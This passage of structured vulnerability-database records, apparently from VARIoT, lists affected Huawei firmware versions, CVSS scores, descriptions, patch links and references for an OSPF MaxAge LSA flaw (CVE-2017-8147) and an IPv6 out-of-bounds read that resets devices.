                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v100r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s7700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s7700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v100r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v100r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v100r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v100r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9300_firmware:v200r008c10:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9300:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r007c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r008c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r002c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r005c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r003c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:s9700_firmware:v200r006c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:s9700:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:secospace_usg6600_firmware:v500r001c20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:secospace_usg6600_firmware:v500r001c00:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:huawei:secospace_usg6600_firmware:v500r001c30:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:huawei:secospace_usg6600:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2017-8147",
         },
      ],
   },
   cve: "CVE-2017-8147",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 5,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Partial",
                  baseScore: 5,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2017-8147",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 5,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "CNVD-2017-37678",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "PARTIAL",
                  baseScore: 5,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-116350",
                  impactScore: 2.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:P",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.5,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 3.9,
                  impactScore: 3.6,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "UNCHANGED",
                  trust: 1,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.5,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2017-8147",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Unchanged",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2017-8147",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2017-37678",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201711-982",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-116350",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37678",
         },
         {
            db: "VULHUB",
            id: "VHN-116350",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-010631",
         },
         {
            db: "NVD",
            id: "CVE-2017-8147",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201711-982",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "AC6005 V200R006C10SPC200,AC6605 V200R006C10SPC200,AR1200 with software V200R005C10CP0582T, V200R005C10HP0581T, V200R005C20SPC026T,AR200 with software V200R005C20SPC026T,AR3200 V200R005C20SPC026T,CloudEngine 12800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 5800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 6800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 7800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 8800 with software V100R006C00, V200R001C00,E600 V200R008C00,S12700 with software V200R005C00, V200R006C00, V200R007C00, V200R008C00,S1700 with software V100R006C00, V100R007C00, V200R006C00,S2300 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S2700 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S5300 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S5700 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S6300 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R008C00,S6700 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S7700 with software V100R003C00, V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S9300 with software V100R001C00, V100R002C00, V100R003C00, V100R006C00, V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R008C10,S9700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,Secospace USG6600 V500R001C00SPC050 have a MaxAge LSA vulnerability due to improper OSPF implementation. When the device receives special LSA packets, the LS (Link Status) age would be set to MaxAge, 3600 seconds. An attacker can exploit this vulnerability to poison the route table and launch a DoS attack. plural Huawei The product contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiAC6005 and other products are all products of China Huawei. HuaweiAC6005 is an access control device. The CloudEngine 12800 is a data center switch device. The OSPF protocol of several Huawei products has a MaxAgeLSA vulnerability. The following products and versions are affected: Huawei AC6005 V200R006C10SPC200 Version; AC6605 V200R006C10SPC200 Version; AR1200 V200R005C10CP0582T Version, V200R005C10HP0581T Version, V200R005C20SPC026T Version; AR200 V200R005C20SPC026T Version; AR3200 V200R005C20SPC026T Version; CloudEngine 12800 V100R003C00 Version, V100R005C00 Version, V100R005C10 Version, V100R006C00 Version, V200R001C00 Version; CloudEngine 5800 V100R003C00 Version, V100R005C00 Version, V100R005C10 Version, V100R006C00 Version, V200R001C00 Version; CloudEngine 6800 V100R003C00 Version, V100R005C00 Version, V100R005C10 Version, V100R006C00 Version, V200R001C00 Version; CloudEngine 7800 V100R003C00 Version, V100R005C00 Version, V100R005C10 Version, V100R006C00 Version, V200R001C00 Version; CloudEngine 8800 V100R006C00, V200R001C00; E600 V200R008C00; S12700 V200R005C00, V200R006C00, V200R007C00, V200R008C00; S1700",
      sources: [
         {
            db: "NVD",
            id: "CVE-2017-8147",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-010631",
         },
         {
            db: "CNVD",
            id: "CNVD-2017-37678",
         },
         {
            db: "VULHUB",
            id: "VHN-116350",
         },
      ],
      trust: 2.25,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2017-8147",
            trust: 3.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-010631",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201711-982",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2017-37678",
            trust: 0.6,
         },
         {
            db: "VULHUB",
            id: "VHN-116350",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37678",
         },
         {
            db: "VULHUB",
            id: "VHN-116350",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-010631",
         },
         {
            db: "NVD",
            id: "CVE-2017-8147",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201711-982",
         },
      ],
   },
   id: "VAR-201711-0985",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37678",
         },
         {
            db: "VULHUB",
            id: "VHN-116350",
         },
      ],
      trust: 1.538758527333333,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37678",
         },
      ],
   },
   last_update_date: "2023-12-18T13:14:05.774000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "huawei-sa-20170720-01-ospf",
            trust: 0.8,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170720-01-ospf-en",
         },
         {
            title: "A patch for the MaxAgeLSA vulnerability exists in the OSPF protocol of various Huawei products.",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/111227",
         },
         {
            title: "Multiple Huawei Product security vulnerabilities",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=76692",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37678",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-010631",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201711-982",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-20",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-116350",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-010631",
         },
         {
            db: "NVD",
            id: "CVE-2017-8147",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170720-01-ospf-en",
         },
         {
            trust: 0.8,
            url: "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-8147",
         },
         {
            trust: 0.8,
            url: "https://nvd.nist.gov/vuln/detail/cve-2017-8147",
         },
         {
            trust: 0.6,
            url: "https://www.huawei.com/cn/psirt/security-advisories/huawei-sa-20170720-01-ospf-cn",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2017-37678",
         },
         {
            db: "VULHUB",
            id: "VHN-116350",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-010631",
         },
         {
            db: "NVD",
            id: "CVE-2017-8147",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201711-982",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2017-37678",
         },
         {
            db: "VULHUB",
            id: "VHN-116350",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2017-010631",
         },
         {
            db: "NVD",
            id: "CVE-2017-8147",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201711-982",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2017-12-20T00:00:00",
            db: "CNVD",
            id: "CNVD-2017-37678",
         },
         {
            date: "2017-11-22T00:00:00",
            db: "VULHUB",
            id: "VHN-116350",
         },
         {
            date: "2017-12-20T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2017-010631",
         },
         {
            date: "2017-11-22T19:29:03.257000",
            db: "NVD",
            id: "CVE-2017-8147",
         },
         {
            date: "2017-11-23T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201711-982",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2017-12-20T00:00:00",
            db: "CNVD",
            id: "CNVD-2017-37678",
         },
         {
            date: "2017-12-08T00:00:00",
            db: "VULHUB",
            id: "VHN-116350",
         },
         {
            date: "2017-12-20T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2017-010631",
         },
         {
            date: "2017-12-08T14:47:28.643000",
            db: "NVD",
            id: "CVE-2017-8147",
         },
         {
            date: "2020-11-06T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201711-982",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201711-982",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Huawei Vulnerability related to input validation in products",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2017-010631",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "input validation error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201711-982",
         },
      ],
      trust: 0.6,
   },
}

var-201802-0445
Vulnerability from variot

IPv6 function in Huawei Quidway S2700 V200R003C00SPC300, Quidway S5300 V200R003C00SPC300, Quidway S5700 V200R003C00SPC300, S2300 V200R003C00, V200R003C00SPC300T, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S2700 V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5300 V200R003C00, V200R003C00SPC300T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R005C05, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S5700 V200R003C00, V200R003C00SPC316T, V200R003C00SPC600, V200R003C02, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00, V200R009C00, S600-E V200R008C00, V200R009C00, S6300 V200R003C00, V200R005C00, V200R007C00, V200R008C00, V200R009C00, S6700 V200R003C00, V200R005C00, V200R005C01, V200R005C02, V200R007C00, V200R008C00, V200R009C00 has an out-of-bounds read vulnerability. An unauthenticated attacker may send crafted malformed IPv6 packets to the affected products. Due to insufficient verification of the packets, successful exploit will cause device to reset. plural Huawei The product contains an out-of-bounds vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. Huawei Quidway S2700 and other Huawei S series switches are Huawei products. The following products and versions are affected: Huawei Quidway S2700 V200R003C00SPC300 Version; Quidway S5300 V200R003C00SPC300 Version; Quidway S5700 V200R003C00SPC300 Version; S2300 V200R003C00 Version, V200R003C00SPC300T Version, V200R005C00 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version; S2700 V200R005C00 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version; S5300 V200R003C00 Version, V200R003C00SPC300T Version, V200R003C00SPC600 Version, V200R003C02 Version, V200R005C00 Version, V200R005C01 Version, V200R005C02 Version, V200R005C03 Version, V200R005C05 Version, V200R006C00 Version, V200R007C00 Version, V200R008C00 Version, V200R009C00 Version ; S5700 etc

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201802-0445",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s6700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c01",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c02",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c03",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c05",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc600",
         },
         {
            model: "s2300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r006c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc600",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c02",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s6300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r009c00",
         },
         {
            model: "s5300",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc316t",
         },
         {
            model: "s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00",
         },
         {
            model: "quidway s5700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r003c00spc300",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s6700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "s2700",
            scope: "eq",
            trust: 1,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s2300",
